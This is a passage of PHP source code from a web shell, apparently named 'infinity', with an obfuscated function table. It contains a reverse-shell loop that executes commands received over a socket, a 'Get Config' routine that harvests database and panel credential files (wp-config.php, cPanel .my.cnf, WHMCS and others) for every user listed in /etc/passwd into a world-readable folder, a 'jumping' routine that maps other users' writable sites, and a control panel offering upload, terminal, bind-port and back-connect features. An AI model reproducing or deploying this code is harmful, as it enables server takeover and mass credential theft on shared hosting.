                    $sockfd = $func[89]($host, $port, $errno, $errstr);
                    if ($errno != 0) {
                        return "<pre>{$errno} : {$errstr}</pre>";
                    } else {
                        if (!$sockfd) {
                            return "<pre>Unexpected error has occured, connection may have failed.</pre>";
                        } else {
                            while (!$func[78]($sockfd)) {
                                $user = exe('whoami');
                                $pwd = exe('pwd');
                                @$func[90]($sockfd, "{$user}@" . (!@$_SERVER["SERVER_ADDR"] ? $func[49]("gethostbyname") ? @$func[40]($_SERVER['SERVER_NAME']) : '????' : @$_SERVER["SERVER_ADDR"]) . "~{$pwd} > ");
                                $command = $func[91]($sockfd, 1337);
                                @$func[90]($sockfd, "\n" . exe($command) . "\n\n");
                            }
                            @$func[92]($sockfd);
                        }
                    }
                }
            }
        }
    }
}
function getConfig()
{
    global $func;
    global $dir;
    if ($func[12]("/etc/passwd")) {
        $passwd = $func[14]("/etc/passwd");
        if ($func[12]("infinity_config")) {
            return "<font class='text-danger'>Folder infinity_config already exist! Please delete it first to get configs!</font>";
        } else {
            $func[15]('infinity_config', 0777);
            $htc = $func[86]('infinity_config/.htaccess', 'w');
            $func[87]($htc, "Options all\nRequire None\nSatisfy Any");
            $func[32]('/(.*?):x:/', $passwd, $user_config);
            foreach ($user_config[1] as $user_con) {
                $user_config_dir = "/home/{$user_con}/public_html/";
                if ($func[9]($user_config_dir)) {
                    $grab_config = ["/home/{$user_con}/.my.cnf" => "cpanel", "/home/{$user_con}/public_html/config/koneksi.php" => "Lokomedia", "/home/{$user_con}/public_html/forum/config.php" => "phpBB", "/home/{$user_con}/public_html/sites/default/settings.php" => "Drupal", "/home/{$user_con}/public_html/config/settings.inc.php" => "PrestaShop", "/home/{$user_con}/public_html/app/etc/local.xml" => "Magento", "/home/{$user_con}/public_html/admin/config.php" => "OpenCart", "/home/{$user_con}/public_html/application/config/database.php" => "Ellislab", "/home/{$user_con}/public_html/vb/includes/config.php" => "Vbulletin", "/home/{$user_con}/public_html/includes/config.php" => "Vbulletin", "/home/{$user_con}/public_html/forum/includes/config.php" => "Vbulletin", "/home/{$user_con}/public_html/forums/includes/config.php" => "Vbulletin", "/home/{$user_con}/public_html/cc/includes/config.php" => "Vbulletin", "/home/{$user_con}/public_html/inc/config.php" => "MyBB", "/home/{$user_con}/public_html/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/shop/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/os/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/oscom/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/products/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/cart/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/inc/conf_global.php" => "IPB", "/home/{$user_con}/public_html/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/wp/test/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/blog/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/beta/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/portal/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/site/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/wp/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/WP/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/news/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/wordpress/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/test/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/demo/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/home/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/v1/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/v2/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/press/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/new/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/blogs/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/configuration.php" => "Joomla", "/home/{$user_con}/public_html/blog/configuration.php" => "Joomla", "/home/{$user_con}/public_html/submitticket.php" => "^WHMCS", "/home/{$user_con}/public_html/cms/configuration.php" => "Joomla", "/home/{$user_con}/public_html/beta/configuration.php" => "Joomla", "/home/{$user_con}/public_html/portal/configuration.php" => "Joomla", "/home/{$user_con}/public_html/site/configuration.php" => "Joomla", "/home/{$user_con}/public_html/main/configuration.php" => "Joomla", "/home/{$user_con}/public_html/home/configuration.php" => "Joomla", "/home/{$user_con}/public_html/demo/configuration.php" => "Joomla", "/home/{$user_con}/public_html/test/configuration.php" => "Joomla", "/home/{$user_con}/public_html/v1/configuration.php" => "Joomla", "/home/{$user_con}/public_html/v2/configuration.php" => "Joomla", "/home/{$user_con}/public_html/joomla/configuration.php" => "Joomla", "/home/{$user_con}/public_html/new/configuration.php" => "Joomla", "/home/{$user_con}/public_html/WHMCS/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/whmcs1/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Whmcs/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/whmcs/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/whmcs/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/WHMC/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Whmc/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/whmc/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/WHM/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Whm/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/whm/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/HOST/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Host/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/host/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/SUPPORTES/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Supportes/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/supportes/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/domains/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/domain/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Hosting/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/HOSTING/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/hosting/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CART/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Cart/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/cart/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/ORDER/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Order/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/order/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CLIENT/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Client/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/client/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CLIENTAREA/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Clientarea/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/clientarea/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/SUPPORT/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Support/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/support/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BILLING/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Billing/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/billing/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BUY/sumitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Buy/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/buy/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/MANAGE/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Manage/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/manage/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/ClientSupport/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Clientsupport/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/clientsupport/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CHECKOUT/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Checkout/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/checkout/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BILLINGS/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Billings/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/billings/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BASKET/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Basket/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/basket/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/SECURE/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Secure/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/secure/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/SALES/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Sales/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/sales/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BILL/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Bill/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/bill/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/PURCHASE/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Purchase/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/purchase/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/ACCOUNT/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Account/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/account/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/USER/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/User/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/user/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CLIENTS/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Clients/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/clients/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BILLINGS/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Billings/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/billings/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/MY/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/My/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/my/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/secure/whm/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/secure/whmcs/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/panel/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/clientes/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/cliente/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/support/order/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/boxbilling/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/box/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/host/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/Host/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/supportes/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/support/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/hosting/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/cart/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/order/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/client/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/clients/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/cliente/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/clientes/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/billing/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/billings/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/my/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/secure/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/support/order/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/includes/dist-configure.php" => "Zencart", "/home/{$user_con}/public_html/zencart/includes/dist-configure.php" => "Zencart", "/home/{$user_con}/public_html/products/includes/dist-configure.php" => "Zencart", "/home/{$user_con}/public_html/cart/includes/dist-configure.php" => "Zencart", "/home/{$user_con}/public_html/shop/includes/dist-configure.php" => "Zencart", "/home/{$user_con}/public_html/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/hostbills/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/host/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/Host/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/supportes/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/support/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/hosting/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/cart/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/order/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/client/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/clients/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/cliente/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/clientes/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/billing/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/billings/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/my/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/secure/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/support/order/includes/iso4217.php" => "Hostbills"];
                    foreach ($grab_config as $config => $nama_config) {
                        $ambil_config = $func[14]($config);
                        if ($ambil_config != '') {
                            $file_config = $func[86]("infinity_config/{$user_con}-{$nama_config}.txt", "w");
                            $func[90]($file_config, $ambil_config);
                        }
                    }
                }
            }
            return "<font class='text-success'>Success get config! Click <a href='?dir={$dir}/infinity_config'>Here!</a></font>";
        }
    } else {
        return "<font class='text-danger'>Can't Read /etc/passwd</font>";
    }
}
function jumping()
{
    global $func;
    if ($func[12]("/etc/passwd")) {
        $i = 0;
        $passwd = $func[14]("/etc/passwd");
        $func[32]('/(.*?):x:/', $passwd, $user_jumping);
        $table = '<div class="table-responsive"><table class="table table-hover"><thead><tr><th>#</th><th>Type</th><th>User</th><th>Domain</th></tr></thead><tbody>';
        foreach ($user_jumping[1] as $user_pro_jump) {
            $user_jumping_dir = "/home/{$user_pro_jump}/public_html";
            if ($func[9]($user_jumping_dir)) {
                $i++;
                $type = 'R';
                if ($func[8]($user_jumping_dir)) {
                    $type = 'RW';
                }
                if ($func[49]('posix_getpwuid')) {
                    $domain_jump = $func[14]("/etc/named.conf");
                    if ($domain_jump == '') {
                        $domain = "Can't get domain";
                    } else {
                        $func[32]("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
                        foreach ($domains_jump[1] as $dj) {
                            $user_jumping_url = $func[33](@$func[36]("/etc/valiases/{$dj}"));
                            $user_jumping_url = $user_jumping_url['name'];
                            if ($user_jumping_url == $user_pro_jump) {
                                $domain = $dj;
                                break;
                            } else {
                                $domain = "Can't get domain";
                            }
                        }
                    }
                } else {
                    $domain = "Can't get domain";
                }
                $table .= "<tr><td>{$i}</td><td>{$type}</td><a href='?dir={$user_jumping_dir}'><font class='text-success'>{$user_pro_jump}</font></a><td></td><td>{$domain}</td></tr>";
            }
        }
        $table .= '</tbody></table></div>';
        if ($i == 0) {
            return "<font class='text-danger'>No Jumping Found!</font>";
        }
        return $table;
    } else {
        return "<font class='text-danger'>Can't Read /etc/passwd</font>";
    }
}
$scandir = $func[21]($dir);
?>
<!doctype html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-+0n0xVW2eSR5OomGNYDnhzAbDsOXxcvSN1TPprVMTNDbiYZCxYbOOl7+AMvyTG2x" crossorigin="anonymous">
	<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
	<title><?php 
echo $shellName;
?></title>
</head>
<body>
	<div class="container-lg">
		
		<nav class="navbar navbar-light bg-light">
			<div class="container-fluid">
				<a class="navbar-brand" href="?">
					<img src="<?php 
echo $logo;
?>" alt="logo" width="30" height="24" class="d-inline-block align-text-top">
					<?php 
echo $shellName;
?>
				</a>
			</div>
		</nav>
		
		<?php 
if (isset($_SESSION['message'])) {
    ?>
		<div class="alert alert-<?php 
    echo $_SESSION['class'];
    ?> alert-dismissible fade show my-3" role="alert">
			<strong><?php 
    echo $_SESSION['status'];
    ?>!</strong> <?php 
    echo $_SESSION['message'];
    ?>
			<button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
		</div>
		<?php 
}
clear();
?>

		<div id="tool">
			<div class="d-flex justify-content-center flex-wrap my-3">
				<a href="?" class="m-1 btn btn-outline-dark btn-sm"><i class="fa fa-home"></i> Home</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#upload" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-upload"></i> Upload</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#newfile" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-file-plus"></i> New File</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#newfolder" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-folder-plus"></i> New Folder</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#jumping" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-link"></i> Jumping</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#get-config" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-wrench"></i> Get Config</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#network" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-network-wired"></i> Network</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#terminal" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-terminal"></i> Terminal</a>
			</div>
			
			<div class="row">
				<div class="col-md-12">
					<div class="collapse" id="upload" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								 <div class="col-md-6">
									<form action="" method="post" enctype="multipart/form-data">
										<div class="input-group">
											<input type="file" class="form-control" name="uploadfile[]" id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload">
											<button class="btn btn-outline-dark" type="submit" id="inputGroupFileAddon04">Upload</button>
										</div>
									</form>
								 </div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="newfile" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<form action="" method="post">
										<div class="mb-3">
											<label class="form-label">File Name</label>
											<input type="text" class="form-control" name="filename" placeholder="infinity.txt">
										</div>
										<div class="mb-3">
											<label class="form-label">File Content</label>
											<textarea class="form-control" rows="5" name="filecontent"></textarea>
										</div>
										<button type="submit" class="btn btn-outline-dark">Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="newfolder" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<form action="" method="post">
										<div class="mb-3">
											<label class="form-label">Folder Name</label>
											<input type="text" class="form-control" name="foldername" placeholder="infinity">
										</div>
										<button type="submit" class="btn btn-outline-dark">Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="network" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6 mb-3">
									<div class="mb-3">
										<p>Bind Port</p>
										<label class="form-label">Port</label>
										<input type="number" class="form-control" value="1337" id="bind-port">
									</div>
									<button class="btn btn-outline-dark" type="button" onclick="bindPort(this)">Bind</button>
								</div>
								<div class="col-md-6 mb-3">
									<div class="mb-3">
										<p>Back Connect</p>
										<label class="form-label">Host</label>
										<input type="text" class="form-control" id="bc-host">
									</div>
									<div class="mb-3">
										<label class="form-label">Port</label>
										<input type="number" class="form-control" value="1337" id="bc-port">
									</div>
									<div class="mb-3">
										<label class="form-label">With</label>
										<select name="with" id="bc-with" class="form-control">
											<option value="php">PHP</option>
											<option value="perl">Perl</option>
											<option value="python">Python</option>
											<option value="ruby">Ruby</option>
										</select>
									</div>
									<button class="btn btn-outline-dark" type="button" onclick="backConnect(this)">Back Connect</button>
								</div>
								<div class="col-md-12" id="network-res"></div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="jumping" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<div class="d-flex justify-content-center flex-wrap my-3">
										<button class="m-1 btn btn-outline-dark btn-sm" onclick="jumping(this)"><i class="fa fa-link"></i> Do Jumping</button>
									</div>
								</div>
								<div class="col-md-6" id="jumping-res"></div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="get-config" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<div class="d-flex justify-content-center flex-wrap my-3">
										<button class="m-1 btn btn-outline-dark btn-sm" onclick="getConfig(this)"><i class="fa fa-wrench"></i> Get All Config</button>
									</div>
								</div>
								<div class="col-md-6" id="config-res"></div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="terminal" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6 mb-3">
									<label class="form-label">Command</label>
									<input type="text" class="form-control" onchange="terminal(this)">
								</div>
								<div class="col-md-6">
									<div id="terminal-res"></div>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>

		<div class="row">
			<div class="col-md-12">
				<div class="card border-dark">
					<div class="card-body">
						<h5><i class="fa fa-server"></i> Server Information </h5>
						<div class="table-responsive">
							<table class="table table-hover text-nowrap">
								<tr>
									<td>Operating System</td>
									<td> : <?php 
echo $uname;
?></td>
								</tr>
								<tr>
									<td>User / Group</td>
									<td> : <?php 
echo $uid;
?>[<?php 
echo $user;
?>] / <?php 
echo $gid;
?>[<?php 
echo $group;
?>]</td>
								</tr>
								<tr>
									<td>PHP Version</td>
									<td> : <?php 
echo $func[1]();
?></td>
								</tr>
								<tr>
									<td>IP Server</td>
									<td> : <?php 
echo !@$_SERVER["SERVER_ADDR"] ? $func[49]("gethostbyname") ? @$func[40]($_SERVER['SERVER_NAME']) : '????' : @$_SERVER["SERVER_ADDR"];
?></td>
								</tr>
								<tr>
									<td>Storage</td>
									<td class="d-flex">: Total = <?php 
echo formatSize($total);
?>, Free = <?php 
echo formatSize($free);
?> [<?php 
echo $pers;
?>%]</td>
								</tr>
								<tr>
									<td>Domains</td>
									<td>: <?php 
echo $dom;
?></td>
								</tr>
								<tr>
									<td>Software</td>
									<td>: <?php 
echo $_SERVER['SERVER_SOFTWARE'];
?></td>
								</tr>
								<tr>
									<td>Disable Functions</td>
									<td>: <?php 
echo $show_ds;
?></td>
								</tr>
								<tr>
									<td>Useful Functions</td>
									<td>: <?php 
echo rtrim($useful, ', ');
?></td>
								</tr>
								<tr>
									<td>Downloader</td>
									<td>: <?php 
echo rtrim($downloader, ', ');
?></td>
								</tr>
								<tr>
									<td colspan="2">CURL : <?php 
echo $func[49]('curl_version') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?> | SSH2 : <?php 
echo $func[49]('ssh2_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?> | Magic Quotes : <?php 
echo $func[49]('get_magic_quotes_gpc') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?> | MySQL : <?php 
echo $func[49]('mysql_get_client_info') || $func[83]('mysqli') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?> | MSSQL : <?php 
echo $func[49]('mssql_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?> | PostgreSQL : <?php 
echo $func[49]('pg_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?> | Oracle : <?php 
echo $func[49]('oci_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?></td>
								</tr>
								<tr>
									<td colspan="2">Safe Mode : <?php 
echo @$func[31]('safe_mode') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>';
?> | Open Basedir : <?php 
echo $open_b;
?> | Safe Mode Exec Dir : <?php 
echo @$func[31]('safe_mode_exec_dir') ? '<font class="text-success">' . @$func[31]('safe_mode_exec_dir') . '</font>' : '<font class="text-warning">NONE</font>';
?> | Safe Mode Include Dir : <?php 
echo @$func[31]('safe_mode_include_dir') ? '<font class="text-success">' . @$func[31]('safe_mode_include_dir') . '</font>' : '<font class="text-warning">NONE</font>';
?></td>
								</tr>
							</table>
						</div>
					</div>
				</div>
			</div>
			<div class="col-md-12 my-3">
				<div class="card border-dark">
					<div class="card-body">
						<h5><i class="fa fa-wave-square"></i> Path </h5>
						<nav aria-label="breadcrumb" style="--bs-breadcrumb-divider: '>';">
							<ol class="breadcrumb">
								<?php 
$numDir = $func[61]($scdir);
foreach ($scdir as $id => $pat) {
    if ($pat == '' && $id == 0) {
        echo "<li class=\"breadcrumb-item\"><a class=\"text-decoration-none text-dark\" href=\"?dir=/\">/</a></li>";
        continue;
    }
    if ($pat == '') {
        continue;
    }
    if ($id + 1 == $numDir) {
        echo '<li class="breadcrumb-item active" aria-current="page">' . $pat . '</li>';
    } else {
        echo "<li class=\"breadcrumb-item\"><a class=\"text-decoration-none text-dark\" href=\"?dir=";
        for ($i = 0; $i <= $id; $i++) {
            echo "{$scdir[$i]}";
            if ($i != $id) {
                echo "/";
            }
        }
        echo '">' . $pat . '</a></li>';
    }
}
?>
							</ol>
						</nav>
						[ <?php 
echo checkPerm($dir, perms($dir));
?> ]
					</div>
				</div>
			</div>
			<div class="col-md-12" id="main">
				<div class="card border-dark overflow-auto">
					<div class="card-body">
						<h5><i class="fa fa-<?php 
echo $icon;
?>"></i> <?php 
echo $title;
?></h5>
						<?php 
if ($do == 'view') {
    ?>
							<h1>Anjing</h1>
						<?php 
} else {
    ?>
							<?php 
    if ($func[9]($dir)) {
        ?>
								<div class="table-responsive">
									<table class="table table-hover text-nowrap">
										<thead>
											<tr>
												<th>Name</th>
												<th>Type</th>
												<th>Size</th>
												<th>Last Modified</th>
												<th>Owner/Group</th>
												<th>Permission</th>
												<th>Action</th>
											</tr>
										</thead>
										<tbody>
											<?php 
        foreach ($scandir as $item) {
            if (!$func[6]($dir . '/' . $item)) {
                continue;
            }
            ?>
												<tr>
													<td>
														<?php 
            if ($item === '..') {
                ?>
														<a href="?dir=<?php 
                echo $func[28]($dir);
                ?>" class="text-decoration-none text-dark"><i class="fa fa-folder-open"></i> <?php 
                echo $item;
                ?></a>
														<?php 
            } elseif ($item === '.') {
                ?>
														<a href="?dir=<?php 
                echo $dir;
                ?>" class="text-decoration-none text-dark"><i class="fa fa-folder-open"></i> <?php 
                echo $item;
                ?></a>
														<?php 
            } else {
                ?>
														<a href="?dir=<?php 
                echo $dir . '/' . $item;
                ?>" class="text-decoration-none text-dark"><i class="fa fa-folder"></i> <?php 
                echo checkName($item);
                ?></a>
														<?php 
            }
            ?>
													</td>
													<td><?php 
            echo $func[38]($item);
            ?></td>
													<td class="align-middle">--</td>
													<td><?php 
            echo $func[19]("Y-m-d h:i:s", $func[20]($item));
            ?></td>
													<td><?php 
            echo getowner($item);
            ?></td>
													<td><?php 
            echo checkPerm($dir . '/' . $item, perms($dir . '/' . $item));
            ?></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" <?php 
            echo $item === ".." || $item === "." ? '' : 'data-bs-toggle="modal" data-bs-target="#renameModal" data-bs-name="' . $item . '"';
            ?>><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" <?php 
            echo $item === ".." || $item === "." ? '' : 'data-bs-toggle="modal" data-bs-target="#deleteModal" data-bs-file="' . $dir . '/' . $item . '"';
            ?>><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
											<?php 
        }
        ?>
											<?php 
        foreach ($scandir as $item) {
            if (!$func[7]($dir . '/' . $item)) {
                continue;
            }
            ?>
												<tr>
													<td><a onclick="getSource('<?php 
            echo $dir . '/' . $item;
            ?>', this)" data-bs-name="<?php 
            echo $item;
            ?>"><i class="fa fa-<?php 
            echo geticon($item);
            ?>"></i> <?php 
            echo checkName($item);
            ?></a></td>
													<td><?php 
            echo checkName($func[49]('mime_content_type') ? $func[63]($item) : $func[38]($item));
            ?></td>
													<td><?php 
            echo formatSize($func[10]($item));
            ?></td>
													<td><?php 
